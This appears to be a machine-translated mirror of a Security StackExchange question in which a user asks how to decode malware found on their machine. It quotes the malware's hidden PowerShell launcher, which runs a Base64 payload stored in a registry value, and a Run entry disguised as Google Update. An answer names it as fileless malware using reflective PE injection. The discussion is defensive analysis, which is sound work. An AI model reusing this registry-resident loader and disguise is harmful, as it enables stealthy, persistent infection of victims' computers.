如何从注册表读取此编码的powershell脚本的源代码?
这句话是ProcessExplorer写的
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe“-noprofile -windowstyle隐藏-executionpolicy旁路iex (Text.Encoding::ASCII.GetString(转换::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));
现在,我确信当我从注册表中读取该病毒时,它可能是一种编码的病毒:
谷歌更新"C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe“C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe REG_SZ /c {BE9473EA-5660-4BF7-91C3-2A2258213EE1} REG_SZ -noprofile -windowstyle隐藏-executionpolicy绕过iex (Text.Encoding::ASCII.GetString(转换::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));
因此,我从注册表导出了数据值LOOTDA,并将其复制为文本文件,并将其上传为这里。
因此,我正在寻找任何专家在加密和解密,以解码和解密这种病毒,以便阅读其源代码和什么可能对我们有害!
谢谢!
回答 2
Security用户
发布于 2016-03-29 14:01:25
此恶意软件试图避免使用文件和进程,方法是将有效负载驻留在注册表中,并使用PowerSploit方法通过PowerShell命令将代码直接加载到内存中。Invoke-ReflectivePEInjection给出了它。它属于Terkop恶意软件家族。
Security用户
发布于 2016-03-29 13:44:26
https://security.stackexchange.com/questions/118870
复制相似问题
腾讯云开发者
